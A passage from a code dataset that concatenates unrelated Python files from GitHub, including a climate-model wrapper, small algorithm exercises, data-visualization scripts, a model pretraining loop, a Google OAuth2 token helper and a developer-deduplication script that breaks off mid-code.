\"\"\"\n udir = os.path.join(os.path.dirname(__file__), \"utils_templates\")\n self.sfilewriter = SCENARIOFILEWRITER(udir)\n self.pamfilewriter = PARAMETERFILEWRITER(udir)\n self._setup_tempdirs()\n self.resultsreader = CSCMREADER(self.rundir, get_endyear(scenariodata))\n\n self.scen = _get_unique_index_values(scenariodata, \"scenario\")\n self.model = _get_unique_index_values(scenariodata, \"model\")\n self.local_scenarioname = self.get_usable_scenario_name()\n self._make_dir_structure(self.local_scenarioname)\n self._call_sfilewriter(scenariodata)\n\n def get_usable_scenario_name(self):\n \"\"\"\n Cut the scenario name and get rid of special characters so run can work\n \"\"\"\n pam_min = os.path.join(self.rundir, \"1\", \"inputfiles\", \"pam_current.scm\")\n executable = _get_executable(self.rundir)\n call_string = f\"{executable} {pam_min}\"\n max_length_1 = 255 - len(call_string) - 60\n max_length_2 = int(\n np.floor(\n (127 - len(os.path.join(\"./\", \"12345\", \"inputfiles\", \"12345_conc.txt\")))\n / 2.0\n )\n )\n max_length = int(np.amin([max_length_1, max_length_2]))\n if max_length < 0:\n max_length = 1\n return re.sub(\"[^a-zA-Z0-9_-]\", \"\", self.scen)[:max_length]\n\n def _call_sfilewriter(self, scenarios):\n \"\"\"\n Call sfilwriter to write scenariodata file\n \"\"\"\n self.sfilewriter.write_scenario_data(\n scenarios,\n os.path.join(self.rundir, self.local_scenarioname),\n self.local_scenarioname,\n )\n\n def run_over_cfgs(self, cfgs, output_variables):\n \"\"\"\n Run over each configuration parameter set\n write parameterfiles, run, read results\n and make an ScmRun with results\n \"\"\"\n runs = []\n for i, pamset in enumerate(cfgs):\n self.pamfilewriter.write_parameterfile(\n pamset,\n os.path.join(self.rundir, self.local_scenarioname),\n )\n executable = _get_executable(self.rundir)\n pamfile = os.path.join(\n self.rundir,\n self.local_scenarioname,\n \"inputfiles\",\n \"pam_current.scm\",\n )\n call = f\"{executable} {pamfile}\"\n\n LOGGER.debug(\"Call, %s\", call)\n subprocess.check_call(\n call,\n cwd=self.rundir,\n shell=True, # nosec # have to use subprocess\n )\n for variable in output_variables:\n (\n years,\n timeseries,\n unit,\n ) = self.resultsreader.read_variable_timeseries(\n self.local_scenarioname,\n variable,\n self.sfilewriter,\n )\n if years.empty: # pragma: no cover\n continue # pragma: no cover\n\n runs.append(\n ScmRun(\n pd.Series(timeseries, index=years),\n columns={\n \"climate_model\": \"CICERO-SCM\",\n \"model\": self.model,\n \"run_id\": pamset.get(\"Index\", i),\n \"scenario\": self.scen,\n \"region\": [\"World\"],\n \"variable\": [variable],\n \"unit\": [unit],\n },\n )\n )\n\n return run_append(runs)\n\n def _setup_tempdirs(self):\n \"\"\"\n Set up temporary directories to run and make output in\n \"\"\"\n root_dir = config.get(\"CICEROSCM_WORKER_ROOT_DIR\", None)\n self.rundir = tempfile.mkdtemp(prefix=\"ciceroscm-\", dir=root_dir)\n LOGGER.info(\"Creating new CICERO-SCM instance: %s\", self.rundir)\n dir_util.copy_tree(\n os.path.join(os.path.dirname(__file__), \"utils_templates\", \"run_dir\"),\n self.rundir,\n )\n\n def cleanup_tempdirs(self):\n \"\"\"\n Remove tempdirs after run\n \"\"\"\n LOGGER.info(\"Removing CICERO-SCM instance: %s\", self.rundir)\n shutil.rmtree(self.rundir)\n\n def _make_dir_structure(self, scenario):\n \"\"\"\n Make directory structure for a scenario in which to put input and\n outputfiles for the run\n \"\"\"\n os.makedirs(self.rundir, exist_ok=True)\n os.makedirs(os.path.join(self.rundir, scenario), exist_ok=True)\n os.makedirs(os.path.join(self.rundir, scenario, \"inputfiles\"), exist_ok=True)\n os.makedirs(os.path.join(self.rundir, scenario, \"outputfiles\"), exist_ok=True)\n","repo_name":"openscm/openscm-runner","sub_path":"src/openscm_runner/adapters/ciceroscm_adapter/ciceroscm_wrapper.py","file_name":"ciceroscm_wrapper.py","file_ext":"py","file_size_in_byte":5965,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"76"} +{"seq_id":"18166392414","text":"OFFSET = 100\nMAX_R = 200\n\n# 색종이 갯수\nn = int(input())\n\n# n개의 색종이 좌측하단 꼭짓점 입력\nrects = [\n tuple(map(int, input().split()))\n for _ in range(n)\n]\n\n# 2차원 좌표평면 선언\nchecked = [\n [0] * (MAX_R + 1)\n for _ in range(MAX_R + 1)\n]\n\nfor x, y in rects:\n # OFFSET 더하기\n x, y = x + OFFSET, y + OFFSET\n\n # 직사각형 칠하기\n for i in range(x, x+8):\n for j in range(y, y+8):\n checked[i][j] += 1\n\n# 모든 정사각형 색종이의 총 넓이\narea = 0\nfor row in checked:\n for elem in row:\n if elem >= 1:\n area += 1\n\nprint(area)","repo_name":"sujinjwa/algorithm","sub_path":"brute-force/FindTotalAreaofSquares.py","file_name":"FindTotalAreaofSquares.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7047651390","text":"import pandas as pd\nimport plotly.graph_objects as go\n\n# Load the CSV file\ndf = pd.read_csv('/content/combined_data_CSIsumed.csv')\n\n# Create the 3D heatmap\nfig = go.Figure(data=go.Scatter3d(\n x=df['x_loc'],\n y=df['y_loc'],\n z=df['z_loc'],\n mode='markers',\n marker=dict(\n size=3,\n color=df['csi_phase_rad'],\n colorscale='Viridis',\n opacity=0.8\n )\n))\n\n# Set axis labels\nfig.update_layout(scene=dict(\n xaxis_title='X',\n yaxis_title='Y',\n zaxis_title='Z'\n))\n\n# Set the layout and display the figure\nfig.show()\n","repo_name":"Hongyi-Sam-Dong/Wireless-Visualization","sub_path":"BedRoom Plotly Heatmap Visulization.py","file_name":"BedRoom Plotly Heatmap Visulization.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4993804041","text":"# -*- coding: UTF-8 -*-\nimport argparse\nimport math\nimport random\nimport time\nfrom MyDataSet_smiles import MyDataSet\nfrom torch.nn.utils.rnn import pad_sequence\nimport torch\nfrom torch.utils.data import DataLoader as DL\nimport torch.optim as optim\nfrom torch import nn\nfrom tqdm import tqdm\nfrom sklearn.manifold import TSNE\nimport os\nos.environ['CUDA_VISIBLE_DEVICES']= '0,1'\nimport globalvar as gl\n# os.environ['CUDA_VISIBLE_DEVICES']= '1'\ngl._init()\nif torch.cuda.is_available():\n device = torch.device('cuda')\n gl.set_value('cuda', device)\n print('The code uses GPU...')\nelse:\n device = torch.device('cpu')\n gl.set_value('cuda', device)\n print('The code uses CPU!!!')\n\n# from transformer import Transformer\nfrom transformer_smiles import Transformer\nfrom transformer_smiles import Encoder\nfrom utils_pretrain import *\nfrom model_pretrain import Net\nfrom nt_xent import NT_Xent\nfrom encoder_gnn import GCNet\nimport matplotlib.pyplot as plt\nimport scipy.stats as stats\nfrom sklearn.metrics import mean_squared_error, r2_score\nplt.switch_backend('agg')\n\"\"\"\n模型预训练\n\n\"\"\"\n\n# train for one epoch to learn unique features\ndef train(net, data_loader, train_optimizer, vocab_dict):\n net.train()\n total_loss, total_num, train_bar = 0.0, 0, tqdm(data_loader)\n feature_graph = torch.Tensor()\n feature_org = torch.Tensor()\n top_3_tokens = []\n for tem in train_bar:\n graph1, out_1, org2, out_2,attn_score = net(tem.to(device))\n top_3_tokens.extend(calculate(tem,attn_score))\n feature_graph = torch.cat((feature_graph, torch.Tensor(graph1.to('cpu').data.numpy())), 0)\n feature_org = torch.cat((feature_org, torch.Tensor(org2.to('cpu').data.numpy())), 0)\n criterion = NT_Xent(out_1.shape[0], temperature, 1)\n loss = criterion(out_1, out_2)\n total_num += len(tem)\n total_loss += loss.item() * len(tem)\n train_bar.set_description('Train Epoch: [{}/{}] Loss: {:.8f}'.format(epoch, epochs, total_loss / total_num))\n\n train_optimizer.zero_grad()\n loss.backward()\n train_optimizer.step()\n # break\n return total_loss / total_num, feature_graph, feature_org, attn_score,top_3_tokens\n\ndef calculate(inputs,attn_score):\n \"\"\"\n 统计计算attention分数最高的前三\n 1. 计算attention score 最大的前三个以及索引\n 2. 通过索引去找对应输入ids的位置的字符标志\n 3. 通过ids去映射到字\n \"\"\"\n # print(inputs.shape,len(attn_score),attn_score[0].shape)\n attn_score = torch.tensor(attn_score[0])\n scores, indexs = torch.sort(attn_score,descending=True)\n top_3_token = []\n for i in range(indexs.shape[0]):\n ids = inputs[i,indexs[i,:3]]\n # print(ids)\n top_3_token.append(ids.cpu().numpy().tolist())\n return top_3_token\ndef get_dict(datafile):\n\n # smiles 字典 统计所有smiles 字符出现频率 有高到低字典排序 1- 43\n src_dict = {}\n with open(\"data/pretrain/data/\" + datafile + \"_dict.txt\", 'r') as f:\n for line in f.readlines():\n line = line.strip()\n k = line.split(' ')[0]\n v = line.split(' ')[1]\n src_dict[k] = int(v)\n f.close()\n sort_dict = {key: rank for rank, key in enumerate(sorted(src_dict.values(), reverse=True), 1)}\n vocab_dict = {k: sort_dict[v] for k, v in src_dict.items()}\n\n vocab_dict[''] = 0\n return vocab_dict\n\ndef compute_rsquared(X, Y):\n xBar = np.mean(X)\n yBar = np.mean(Y)\n SSR = 0\n varX = 0\n varY = 0\n for i in range(0, len(X)):\n diffXXBar = X[i] - xBar\n diffYYBar = Y[i] - yBar\n SSR += (diffXXBar * diffYYBar)\n varX += diffXXBar ** 2\n varY += diffYYBar ** 2\n\n SST = math.sqrt(varX * varY)\n r2=round((SSR / SST) ** 2,3)\n return r2\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Train ATMTCR')\n parser.add_argument('--datafile', default='data', help='orginal data for input in-vitro tryout now')\n parser.add_argument('--path', default='pretrain', help='orginal data for input')\n parser.add_argument('--feature_dim', default=32, type=int, help='Feature dim for latent vector')\n parser.add_argument('--temperature', default=0.1, type=float, help='Temperature used in softmax')\n parser.add_argument('--k', default=200, type=int, help='Top k most similar images used to predict the label')\n parser.add_argument('--batch_size', default=1024, type=int, help='Number of images in each mini-batch')\n parser.add_argument('--epochs', default=50, type=int, help='Number of sweeps over the dataset to train')\n parser.add_argument('--downtask', default='model_downstream.py', help='Number of sweeps over the dataset to train')\n # d_ff, d_k, d_v, n_heads = 64, 64, 64, 2\n\n #目前最佳batch_size1024\n d_ff, d_k, d_v, n_heads = 128, 128, 128, 2\n n_layers = 2\n precet = 0.25\n dropout = 0.2\n\n\n # args parse\n args = parser.parse_args()\n print(args)\n feature_dim, temperature, k, datafile = args.feature_dim, args.temperature, args.k, args.datafile\n\n batch_size, epochs = args.batch_size, args.epochs\n\n train_datas = []\n # data prepare\n train_data = TestbedDataset(root=args.path, dataset=args.datafile)\n\n\n vocab_dict = get_dict(datafile)\n vl = len(vocab_dict)\n PAD_IDX = vocab_dict.get('')\n # encoder drug_smiles\n smile_seqs = []\n # 将一个batch的smiles 转化为 torch向量\n for smile in train_data:\n smile_seq = [int(vocab_dict.get(i)) for i in smile]\n\n tgt = torch.LongTensor(smile_seq)\n # tgt = torch.cat([torch.tensor([self.BOS_IDX]), torch.LongTensor(smile_seq), torch.tensor([self.EOS_IDX])], dim=0)\n\n # smile_seq[random.randint(0, len(smile) - 1)] = 0\n smile_seqs.append(torch.LongTensor(smile_seq))\n\n # 统一序列长度\n src_seq = pad_sequence(smile_seqs, batch_first=True, padding_value=PAD_IDX)\n src_seq_len = src_seq.shape[1] # 序列长度\n train_data = MyDataSet(src_seq)\n\n\n # model setup and optimizer config\n\n\n # encoder\n # model_encoder1 = GCNet().cuda()\n coder = Encoder(src_vocab_size=vl, d_model=feature_dim, d_ff=d_ff, d_k=d_k, d_v=d_v, n_heads=n_heads, n_layers=n_layers).to(device)\n model = Transformer(src_vocab_size=vl, tgt_vocab_size=None, d_model=feature_dim, d_ff=d_ff, d_k=d_k, d_v=d_v, n_heads=n_heads, n_layers=n_layers, precet=precet, seq_len=src_seq_len, dropout=dropout, trans_encoder=coder).cuda()\n if torch.cuda.device_count() > 1:\n print(\"Let's use\", torch.cuda.device_count(), \"GPUs!\")\n model = nn.DataParallel(model, device_ids=[0, 1]) # 在这里使用了2个GPU\n\n model.to(device)\n from collections import Counter\n optimizer = optim.Adam(model.parameters(), lr=0.0001, weight_decay=1e-7)\n # training loop\n results = {'train_loss': [], 'test_acc@1': [], 'test_acc@5': []}\n save_name_pre = '{}_{}_{}'.format(batch_size, epochs,datafile)\n if not os.path.exists('results/'+save_name_pre):\n os.mkdir('results/'+save_name_pre)\n tsne = TSNE()\n AUCs = ('Epoch\\tloss\\tr2\\ttime')\n for epoch in range(1, epochs + 1):\n start = time.time()\n # train_loader = DL(train_data, batch_size=batch_size, shuffle=True)\n train_loader = DL(train_data, batch_size=batch_size, shuffle=False)\n train_loss, features, org, attn_score,top_3_tokens = train(model, train_loader, optimizer, vocab_dict)\n # 取频率最大\n top_3_tokens = [j for i in top_3_tokens for j in i]\n counts = {k:top_3_tokens.count(v) for k,v in vocab_dict.items()}\n counts = sorted(counts.items(),key=lambda x:x[1],reverse=True)\n with open(f\"counts/count_{epoch}_feq.json\",'w',encoding='utf8') as f:\n import json\n json.dump(counts,f,ensure_ascii=False,indent=2)\n # print(counts)\n # exit(0)\n torch.save(model.state_dict(), 'results/model_transformer_state_dict.pkl')\n torch.save(model, 'results/model_transformer.pkl')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"hliulab/atmtcr","sub_path":"TCR-encoder/main_train.py","file_name":"main_train.py","file_ext":"py","file_size_in_byte":8033,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"18986046238","text":"#!/usr/bin/env python3\n# -*- coding: utf-8, vim: expandtab:ts=4 -*-\n\nimport os\nfrom urllib.parse import parse_qs\nfrom argparse import ArgumentParser\nfrom configparser import ConfigParser\nfrom wsgiref.simple_server import make_server\n\nfrom requests_oauthlib import OAuth2Session\n\n\ndef authorize_app_for_token(client_id, client_secret, redirect_uri, authorization_base_url, token_url, scope):\n session = OAuth2Session(client_id, scope=scope, redirect_uri=redirect_uri)\n\n # Redirect user to Google for authorization\n authorization_url, state = session.authorization_url(authorization_base_url,\n # offline for refresh token\n # force to always make user click authorize\n access_type='offline', prompt='select_account')\n\n print('Please go here and authorize:', authorization_url)\n\n if redirect_uri == 'http://localhost':\n # Hack to piggyback the code out of the HTTP server\n piggyback = []\n def oauth2_redirect_url_handler(environ, start_response):\n status = '200 OK'\n headers = [('Content-type', 'text/plain; charset=utf-8')]\n\n returned_code = parse_qs(environ['QUERY_STRING'])['code'][0]\n piggyback.append(returned_code)\n\n start_response(status, headers)\n\n return [f'code: {returned_code}\\n'.encode('UTF-8')]\n\n try:\n with make_server('', 80, oauth2_redirect_url_handler) as httpd:\n print('Serving HTTP on port 80...')\n # Serve one request, then exit\n httpd.handle_request()\n code = piggyback[0]\n except PermissionError:\n # INFO https://stackoverflow.com/questions/413807/is-there-a-way-for-non-root-processes-to-bind-to-privileged-ports-on-linux/27989419#27989419\n print('Cannot bind to port 80!\\n\\nUse\\n'\n 'sudo setcap \\'cap_net_bind_service=+ep\\' /usr/bin/python3.10\\n'\n 'command to allow Python to bind\\n'\n '(Revoke the right with\\n'\n 'sudo setcap \\'cap_net_bind_service=-ep\\' /usr/bin/python3.10\\n'\n ') or setup authbind:\\n'\n '1. sudo touch /etc/authbind/byport/80\\n'\n '2. sudo chmod o+x /etc/authbind/byport/80\\n'\n 'Run tis program: authbind ./venv/bin/python [THIS_FILE] [PARAMS]')\n exit(1)\n else:\n # Get the authorization verifier code from the callback URL\n code = input('Paste the authorization code: ')\n print() # New line after the input line for the next print\n\n # Fetch the token\n os.environ['OAUTHLIB_RELAX_TOKEN_SCOPE'] = '1'\n session.fetch_token(token_url, client_secret=client_secret, code=code)\n\n return session.token['access_token'], session.token['refresh_token']\n\n\ndef parse_args():\n parser = ArgumentParser(description='Get OAuth2 token by authorizing the app')\n # Credentials you get from registering a new application\n parser.add_argument('-c', '--client-id', dest='client_id', help='Client ID', metavar='CLIENT_ID',\n required=True)\n parser.add_argument('-s', '--client-secret', dest='client_secret', help='Client secret', metavar='CLIENT_SECRET',\n required=True)\n # To get a code istead redirecting\n parser.add_argument('-r', '--redirect-uri', dest='redirect_uri',\n help='Redirect URI (default: http://localhost) use \\'oob\\' or other URL to get code'\n ' instead of redirecting (if supported)!',\n metavar='REDIRECT_URI', default='http://localhost')\n # OAuth endpoints (given in the Google API documentation)\n parser.add_argument('-b', '--base-url', dest='authorization_base_url',\n help='Authorization base URL (default: https://accounts.google.com/o/oauth2/v2/auth)',\n metavar='BASE_URL', default='https://accounts.google.com/o/oauth2/v2/auth')\n parser.add_argument('-t', '--token-url', dest='token_url',\n help='Token URL (default: https://www.googleapis.com/oauth2/v4/token)',\n metavar='TOKEN_URL', default='https://www.googleapis.com/oauth2/v4/token')\n # Scope for IMAP access\n parser.add_argument('--scope', dest='scope', nargs='+', default=['https://mail.google.com/'],\n help='Scope (default: https://mail.google.com/)', metavar='SCOPE')\n # Write refresh token to INI file\n parser.add_argument('-f', '--auth-file', dest='auth_file',\n help='The filename contains the configurations (default: auth.ini)',\n metavar='FILENAME', default='auth.ini')\n parser.add_argument('-i', '--section', dest='section',\n help='The filename contains the configurations (default: TO)',\n metavar='SECTION', default='TO')\n\n return parser.parse_args()\n\n\ndef print_and_save_token(access_token, refresh_token, auth_file, section):\n auth_config = ConfigParser()\n auth_config.read(auth_file, encoding='UTF-8')\n auth_config[section]['refresh_token'] = refresh_token\n with open(auth_file, 'w', encoding='UTF-8') as configfile:\n auth_config.write(configfile)\n # Print the tokens\n print(f'Access token: {access_token}')\n print(f'Refresh token: {refresh_token}')\n print(f'Refresh token is written into: {auth_file} section {section}')\n\n\ndef main():\n args = parse_args()\n access_token, refresh_token = authorize_app_for_token(args.client_id, args.client_secret, args.redirect_uri,\n args.authorization_base_url, args.token_url, args.scope)\n print_and_save_token(access_token, refresh_token, args.auth_file, args.section)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"dlazesz/syncimap","sub_path":"get_oauth2_token.py","file_name":"get_oauth2_token.py","file_ext":"py","file_size_in_byte":5979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33275474120","text":"def is_VPS(A):\n stack = []\n for i in range(len(A)):\n if A[i] == \"(\":\n stack.append(A[i])\n else:\n if len(stack)==0:\n return False\n else:\n stack.pop()\n continue\n #print(stack)\n if len(stack)!=0:\n return False\n return True\n\nn = int(input())\nresult = []\nfor i in range(n):\n temp = input()\n result.append(temp)\n\nfor i in result:\n if is_VPS(i):\n print(\"YES\")\n else:\n print(\"NO\")","repo_name":"jyojun/algorithm","sub_path":"baekjoon/class2/괄호.py","file_name":"괄호.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28614866129","text":"import pandas as pd\nimport streamlit as st\nimport altair as alt\n\ndict={}\nnucleo_list={'A','T','G','C'}\nst.write('# DNA necleotide count App')\nst.write('***')\n\n#read input DNA from the web app\nread_input=st.text_area(\"Input DNA sequence\",height=250)\n\n#replace line feeds,carriage returns and spaces and convert to upper\ncleansed_input=read_input.replace('\\n','').replace('\\r','').replace(' ','').upper()\n\n#check if DNA sequence entered is valid\nif cleansed_input and not(set(cleansed_input).issubset(nucleo_list)):\n st.error(\"DNA sequence needs to be a sequence of A,T,G,C \")\nelse:\n #create a dictionary with the nucleotide counts\n for letter in cleansed_input:\n dict[letter]=dict.setdefault(letter,0)+1\n\nst.write(pd.DataFrame([dict]))\ndf=pd.DataFrame.from_dict(dict,orient='index')\nst.write(df)\ndf.reset_index(inplace=True)\ndf=df.rename(columns={'index':'nucleotide',0:'count'})\nst.write(\"df is :\",df)\n\n#create a chart\n\nst.subheader('Bar Chart')\np=alt.Chart(df).mark_bar().encode(x='nucleotide:O', y='count:Q').properties(width=alt.Step(100))\nst.write(p)","repo_name":"agvar/Python-data-apps","sub_path":"dna_count/dna_count.py","file_name":"dna_count.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"74635496566","text":"import os, cv2\nimport numpy as np\n\ndef get_video_frames(videofile):\n assert os.path.exists(videofile), \"File does not exist: %s\"%(videofile)\n # get the video data\n cap = cv2.VideoCapture(videofile)\n ret, frame = cap.read()\n video_data = []\n while (ret):\n video_data.append(frame)\n ret, frame = cap.read()\n \n return video_data\n\ndef read_coord_arrays(coord_file):\n \"\"\" Read coordinate array\n \"\"\"\n assert os.path.exists(coord_file), \"File does not exist: %s\"%(coord_file)\n coord_data = []\n with open(coord_file, 'r') as f:\n for line in f.readlines():\n x_coord = int(line.strip().split(',')[0])\n y_coord = int(line.strip().split(',')[1])\n coord_data.append([x_coord, y_coord])\n coord_data = np.array(coord_data, dtype=np.int32)\n return coord_data\n\ndef read_mapping(map_file):\n map_dict = {'ID_data':[], 'ID_paper':[], 'participants':[], 'accident':[]}\n with open(map_file, 'r') as f:\n for line in f.readlines():\n strs = line.strip().split(',')\n map_dict['ID_data'].append(int(strs[0]))\n map_dict['ID_paper'].append(int(strs[1]))\n obj_list = strs[2:4]\n if 'self' in obj_list:\n obj_list.remove('self')\n map_dict['participants'].append(obj_list)\n map_dict['accident'].append(strs[4])\n return map_dict\n\nif __name__ == \"__main__\":\n\n root_path = './data/DADA-2000'\n fps = 30\n phase = 'testing'\n atype = '40' # '1', '16', '11', '34', '40'\n sequence = '080' # '022', '001', '097', '088', '080'\n barWidth = 60\n vis_video_file = './vis_data/vis_' + atype + '_' + sequence + '.avi'\n\n video_file = os.path.join(root_path, phase, 'rgb_videos', atype, sequence + '.avi')\n salmap_file = os.path.join(root_path, phase, 'salmap_videos', atype, sequence + '.avi')\n coord_file = os.path.join(root_path, phase, 'coordinate', atype, sequence + '_coordinate.txt')\n mapping_file = os.path.join(root_path, 'mapping.txt')\n \n video_data = get_video_frames(video_file)\n salmap_data = get_video_frames(salmap_file)\n assert len(video_data) == len(salmap_data)\n\n coord_data = read_coord_arrays(coord_file)\n assert len(video_data) == coord_data.shape[0]\n\n map_dicts = read_mapping(mapping_file)\n\n video_writer = cv2.VideoWriter(vis_video_file, cv2.VideoWriter_fourcc(*'DIVX'), fps, (video_data[0].shape[1], video_data[0].shape[0]))\n heatmap = np.zeros_like(video_data[0])\n h, w, c = heatmap.shape\n progress_bar = np.full((barWidth, w, c), (255, 255, 0), np.uint8) # cyan color\n for t, (frame, salmap, fixation) in enumerate(zip(video_data, salmap_data, coord_data)):\n # add saliency heatmap as overlap\n heatmap = cv2.applyColorMap(salmap, cv2.COLORMAP_JET)\n visframe = cv2.addWeighted(frame, 0.7, heatmap, 0.3, 0)\n\n # add colorbar for temporal axis\n step = int(np.ceil(frame.shape[1] / len(video_data)))\n progress_bar[:, 0:t*step, 0] = 0 # fill green color (0, 255, 0)\n\n if fixation[0] != 0 and fixation[1] != 0:\n # add fixation point\n visframe = cv2.drawMarker(visframe, tuple(fixation), (0, 255, 255), markerType=cv2.MARKER_STAR, markerSize=20, thickness=5)\n # add temporal annotations\n progress_bar[:, t*step: min((t+1)*step, w), 0] = 0 # fill red color (0, 0, 255)\n progress_bar[:, t*step: min((t+1)*step, w), 1] = 0\n progress_bar[:, t*step: min((t+1)*step, w), 2] = 255\n # add textual description\n idx = map_dicts['ID_data'].index(int(atype))\n participants = map_dicts['participants'][idx]\n tag1 = 'participants: %s'%(participants[0])\n if len(participants) > 1:\n tag1 += ',' + participants[1]\n tag2 = 'accidents: %s'%(map_dicts['accident'][idx])\n cv2.putText(visframe, tag1, (60, 60), cv2.FONT_HERSHEY_TRIPLEX, 1.5, (0,255,255), 2, cv2.LINE_AA)\n cv2.putText(visframe, tag2, (60, 120), cv2.FONT_HERSHEY_TRIPLEX, 1.5, (0,255,255), 2, cv2.LINE_AA)\n\n visframe[frame.shape[0]-barWidth-1: frame.shape[0]-1, :, :] = cv2.addWeighted(visframe[frame.shape[0]-barWidth-1: frame.shape[0]-1, :, :], 0.3, progress_bar, 0.7, 0)\n # write result video\n video_writer.write(visframe)","repo_name":"Cogito2012/DRIVE","sub_path":"src/visualize_data.py","file_name":"visualize_data.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"76"} +{"seq_id":"7091124477","text":"class Section:\n \"\"\" Die verschiedenen Ansichten \"\"\" \n PLANNING = 6\n DOWNLOAD = 7\n \"\"\" Geplante Sendungen\"\"\"\n OTRKEY = 0\n \"\"\" Nicht dekodiert \"\"\"\n VIDEO_UNCUT = 1\n VIDEO_CUT = 2\n ARCHIVE = 3\n TRASH = 4\n \nclass Action:\n # planning\n PLAN_ADD = 11\n PLAN_REMOVE = 12\n PLAN_EDIT = 13\n PLAN_SEARCH = 14\n # download\n DOWNLOAD_ADD = 16\n DOWNLOAD_ADD_LINK = 17\n DOWNLOAD_START = 18\n DOWNLOAD_STOP = 19\n DOWNLOAD_REMOVE = 20\n # decode and cut\n DECODE = 0\n DECODEANDCUT = 1\n CUT = 2\n # file movement\n DELETE = 3\n ARCHIVE = 4\n RESTORE = 6\n RENAME = 7\n NEW_FOLDER = 8\n REAL_DELETE = 10\n\nclass Cut_action:\n ASK = 0\n BEST_CUTLIST = 1\n CHOOSE_CUTLIST = 2\n MANUALLY = 3\n LOCAL_CUTLIST = 4\n\nclass Status:\n OK = 0\n ERROR = 1\n NOT_DONE = 2\n \nclass Format:\n AVI = 0\n HQ = 1\n MP4 = 2\n HD = 3\n AC3 = 4\n \nclass Program:\n AVIDEMUX = 0\n VIRTUALDUB = 1\n CUT_INTERFACE = 2\n SMART_MKVMERGE = 3\n \nclass DownloadTypes:\n TORRENT = 0\n BASIC = 1\n OTR_DECODE = 2\n OTR_CUT = 3 \n \nclass DownloadStatus:\n RUNNING = 0\n STOPPED = 1\n ERROR = 2\n FINISHED = 3\n SEEDING = 4\n","repo_name":"monarc99/otr-verwaltung","sub_path":"otrverwaltung/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"76"} +{"seq_id":"22842688481","text":"#!/usr/bin/env python\n\nimport logging\nfrom uuid import uuid4\n\nimport dedupe\nimport numpy as np\nimport pandas as pd\nimport typer\nfrom sentence_transformers import SentenceTransformer\nfrom sentence_transformers.util import cos_sim\nfrom tqdm import tqdm\n\nfrom rs_graph.bin.typer_utils import setup_logger\nfrom rs_graph.data import (\n DATA_FILES_DIR,\n RS_GRAPH_DEDUPED_REPO_CONTRIBUTORS_PATH,\n RS_GRAPH_LINKED_AUTHORS_DEVS_PATH,\n load_rs_graph_author_contributions_dataset,\n load_rs_graph_deduped_repo_contributors_dataset,\n load_rs_graph_repo_contributors_dataset,\n)\n\n###############################################################################\n\nlog = logging.getLogger(__name__)\n\n###############################################################################\n\napp = typer.Typer()\n\n###############################################################################\n\n\ndef _get_unique_devs_frame_from_dev_contributions(\n dev_contributions_df: pd.DataFrame,\n) -> pd.DataFrame:\n # Each row should be a unique person\n log.info(\"Getting unique developers frame...\")\n unique_devs = []\n for username, group in dev_contributions_df.groupby(\"username\"):\n flat_co_contribs = []\n for co_contribs in group.co_contributors:\n flat_co_contribs.extend(co_contribs)\n\n unique_devs.append(\n {\n \"username\": username,\n \"repos\": tuple(group.repo),\n \"name\": group[\"name\"].iloc[0],\n \"company\": group.company.iloc[0],\n \"email\": group.email.iloc[0],\n \"location\": group.location.iloc[0],\n \"bio\": group.bio.iloc[0],\n \"co_contributors\": tuple(flat_co_contribs),\n }\n )\n\n # Reform as df\n return pd.DataFrame(unique_devs)\n\n\ndef _dataframe_to_joined_str_items(\n df: pd.DataFrame,\n unique_key: str,\n tqdm_desc: str,\n ignore_columns: list[str] | None = None,\n) -> dict[str, str]:\n # Init ignore columns\n if ignore_columns is None:\n ignore_columns = []\n\n joined_str_dict = {}\n for _, row in tqdm(df.iterrows(), desc=tqdm_desc):\n # Convert to dict and convert None values to \"None\" string\n details = row.to_dict()\n for key, value in details.items():\n if value is None:\n details[key] = str(value)\n\n # Construct string\n dev_values_list = []\n for key, value in details.items():\n if key not in ignore_columns:\n if isinstance(value, tuple):\n multi_values = [v for v in value if v is not None]\n value = \", \".join(multi_values)\n\n dev_values_list.append(f\"{key}: {value};\")\n\n # Get unique key value\n try:\n unique_key_value = details[unique_key]\n except KeyError:\n unique_key_value = None\n\n # If no unique key value, create a guid\n if unique_key_value is None:\n # Create a guid\n unique_key_value = str(uuid4())\n\n # Construct string\n joined_str_dict[unique_key_value] = \"\\n\".join(dev_values_list)\n\n return joined_str_dict\n\n\n# @app.command()\n# def create_developer_deduper_dataset_for_annotation(\n# top_n_similar: int = 3,\n# model_name: str = \"BAAI/bge-base-en-v1.5\",\n# debug: bool = False,\n# ) -> None:\n# # Setup logging\n# setup_logger(debug=debug)\n\n# # Load the repo contributors dataset\n# log.info(\"Loading developer contributions dataset...\")\n# developer_contributions = load_rs_graph_repo_contributors_dataset()\n\n# # Get unique devs frame\n# unique_devs_df = _get_unique_devs_frame_from_dev_contributions(\n# developer_contributions,\n# )\n\n# # Start the dev comparisons details\n# prepped_devs_list = _dataframe_to_joined_str_items(\n# unique_devs_df,\n# tqdm_desc=\"Converting dev details to strings...\",\n# )\n\n# # Create embeddings for each dev\n# log.info(\"Creating embeddings for each dev...\")\n# model = SentenceTransformer(model_name)\n# dev_embeddings = model.encode(\n# prepped_devs_list,\n# show_progress_bar=True,\n# )\n\n# # Construct pairwise similarity matrix\n# pairwise_similarity_matrix: list[list[float]] = []\n# for dev_embedding in tqdm(\n# 